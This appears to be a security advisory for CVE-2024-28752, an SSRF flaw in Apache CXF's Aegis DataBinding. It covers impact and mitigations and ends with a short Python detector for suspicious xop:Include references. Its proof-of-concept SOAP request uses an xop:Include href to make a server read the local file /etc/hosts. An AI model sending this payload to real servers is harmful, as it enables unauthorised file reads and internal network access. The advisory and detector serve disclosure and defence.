Apache CXF Aegis DataBinding SSRF – CVE-2024-28752

Vulnerable Version

before 4.0.4, 3.6.3 and 3.5.8

Fixed Version

versions 4.0.4, 3.6.3, or 3.5.8 or later

Base Score

9.3 critical

Vendor Description:-

Apache CXF is an open-source services framework that enables developers to create and maintain safe, resilient web services. It supports both SOAP and RESTful web service protocols, making it adaptable to various architectures. CXF interacts seamlessly with Java programs and supports service creation via annotations or configuration files. It is frequently used in enterprise environments due to its robust support for security, logging, and service interoperability. Overall, Apache CXF facilitates the creation and deployment of scalable, standards-compliant web services.

CVE-2024-28752 Description:-

An SSRF vulnerability in Apache CXF versions prior to 4.0.4, 3.6.3, and 3.5.8 allows an attacker to launch SSRF-style attacks on web services that accept at least one parameter of any type. This vulnerability only affects services using the Aegis DataBinding; other data bindings, including the default, are unaffected. Attackers can use this vulnerability to obtain access to internal resources by forcing the server to submit requests to arbitrary URLs, potentially exposing information or launching additional attacks on internal systems.

Impact:

  • Read arbitrary local files on the server, exposing sensitive data and configuration files.
  • Perform SSRF to access internal-only services or cloud metadata endpoints.
  • Steal credentials or secrets that may enable unauthorized access to other systems.
  • Map internal infrastructure through SSRF-based port scanning or service probing.
  • Facilitate chained attacks that could lead to privilege escalation or remote code execution using leaked information.

Mitigation

  • Upgrade to Apache CXF version 4.0.4, 3.6.3, or 3.5.8 (or newer) where this vulnerability is fixed.
  • Stop using Aegis DataBinding — switch to a secure, supported alternative like the default JAXB data binding.
  • Validate and sanitize all input parameters, especially those used in web service calls.
  • Restrict outbound network traffic using firewall rules, egress controls, or proxy whitelists.
  • Disable unused data bindings or services to minimize attack surface.

POC

Send this request to the server

POST /test HTTP/1.1
Host: your-ip:8080
Content-Type: multipart/related; boundary=----kkkkkk123123213
Content-Length: 472
Connection: close

------kkkkkk123123213
Content-Disposition: form-data; name="1"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
   <soapenv:Header/>
   <soapenv:Body>
      <web:test>
         <arg0>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/hosts"></xop:Include></count>
</arg0>
      </web:test>
   </soapenv:Body>
</soapenv:Envelope>
------kkkkkk123123213--
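As an added defender-side check (not part of the original post and not Apache CXF code), the Python snippet below scans a multipart request body for xop:Include references whose href does not use the cid: scheme, which is the only scheme a legitimate XOP include uses to point at another MIME part. The sample body is constructed from the request above plus one benign cid: part.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XOP_NS = "http://www.w3.org/2004/08/xop/include"

# Constructed sample: the boundary and envelope from the request above,
# plus a second benign part that uses the cid: scheme XOP actually expects.
BOUNDARY = "----kkkkkk123123213"
SAMPLE_BODY = (
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="1"\r\n\r\n'
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"'
    ' xmlns:web="http://service.namespace/"><soapenv:Body><web:test><arg0>'
    '<count><xop:Include xmlns:xop="' + XOP_NS + '" href="file:///etc/hosts"/>'
    "</count></arg0></web:test></soapenv:Body></soapenv:Envelope>\r\n"
    "--" + BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="2"\r\n\r\n'
    '<doc xmlns:xop="' + XOP_NS + '"><xop:Include href="cid:part1@example"/></doc>\r\n'
    "--" + BOUNDARY + "--\r\n"
)

def suspicious_xop_hrefs(xml_text: str) -> list[str]:
    """Return href values of xop:Include elements whose scheme is not cid:.
    XOP defines Include as a reference to another MIME part of the same message
    via a cid: URI, so any other scheme (file:, http:, ...) is a red flag."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return []  # not XML at all; nothing for this check to flag
    return [
        el.get("href", "")
        for el in root.iter(f"{{{XOP_NS}}}Include")
        if urlsplit(el.get("href", "")).scheme.lower() != "cid"
    ]

def scan_multipart_body(body: str, boundary: str) -> list[str]:
    """Split a multipart body at its boundary and scan every XML part."""
    findings = []
    for part in body.replace("\r\n", "\n").split("--" + boundary):
        part = part.strip()
        if not part or part == "--":  # preamble, or the closing "--"
            continue
        # Part headers end at the first blank line; what follows is the payload.
        _, _, payload = part.partition("\n\n")
        if payload.lstrip().startswith("<"):
            findings.extend(suspicious_xop_hrefs(payload.strip()))
    return findings
```

In production, parse with defusedxml or an equivalently hardened parser rather than the stdlib ElementTree used here for portability.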